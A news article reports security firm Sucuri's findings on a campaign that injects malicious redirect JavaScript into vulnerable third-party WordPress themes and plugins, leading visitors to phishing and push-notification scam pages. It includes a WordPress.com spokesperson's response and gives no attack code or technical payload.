Hackers Are Exploiting WordPress Themes, Plugins to Hawk Scams

Photo shows a magnifying glass over a screen with computer code.

Thousands of WordPress sites have been hacked via known vulnerabilities in recent months, according to security firm Sucuri.
Photo: Jack Guez/AFP (Getty Images)

If you’ve visited a website in recent days and been randomly redirected to the same pages with sketchy “resources” or unwanted ads, it’s likely the site in question was 1) built with WordPress tools and 2) hacked.

Researchers at Sucuri, a security provider owned by GoDaddy, revealed on Wednesday that the hackers behind a months-long campaign focused on injecting malicious scripts into WordPress themes and plugins with known security holes were at work yet again.

It’s important to note that these hacks are related to themes and plugins built by thousands of third-party developers using the open source WordPress software, not WordPress.com, which offers hosting and tools to build websites. Automattic, WordPress.com’s parent company, is a major contributor to the software but does not own it.

According to Sucuri, there are 322 WordPress sites with plugins and themes that have been affected by this new exploit, although the “actual number of impacted websites is likely much higher.”

In April alone, hackers used this tactic to infect nearly 6,000 sites, Sucuri malware analyst Krasimir Konov stated.

Sucuri noticed the hackers’ intrusions this past Monday while investigating WordPress sites that complained of unwanted redirects. All of the websites shared a common issue, Konov explained; they contained a malicious JavaScript hidden in their files and databases.

The JavaScript creates redirects that lead users to a range of poisoned apples, including phishing pages and malware, the researcher explained. Worst of all, visitors might not even notice they’re going down the internet’s version of a dark and dangerous alley, as the redirect landing page looks fairly innocent.

“This page tricks unsuspecting users into subscribing to push notifications from the malicious site. If they click on the fake CAPTCHA, they’ll be opted in to receive unwanted ads even when the site isn’t open — and ads will look like they come from the operating system, not from a browser,” Konov wrote.

If that weren’t bad enough, Konov said that opt-in manuevers for push notifications are one of the most common ways hackers can run tech support scams. These consist of the annoying windows that pop up out of nowhere to tell you that your computer is infected and that you should call a phone number to get it fixed. Do not do this. The Federal Trade Commission, which is an expert in detecting scams, helpfully points out that real security messages and warnings will not ask you to call a phone number to get tech help.

WordPress.com on Thursday told Gizmodo that plugins and themes are independently written and maintained outside of the core WordPress software. In regards to Sucuri’s report, the company said that any plugin or theme hosted on WordPress.org, the website for the software, “is regularly scanned for vulnerabilities.”

“If security issues are identified, plugin and theme authors are notified immediately. Specific to Sucuri’s report, any plugin that wasn’t patched was either closed or not hosted on WordPress.org. WordPress.org also provides resources on security to both theme developers and plugin developers,” a spokesperson for WordPress.com said. “For self-hosted sites, WordPress users are notified and encouraged to update core software, plugins and themes by default.”

Sites hosted on WordPress.com are also offered services that address vulnerabilities like those referenced in the report, the spokesperson added.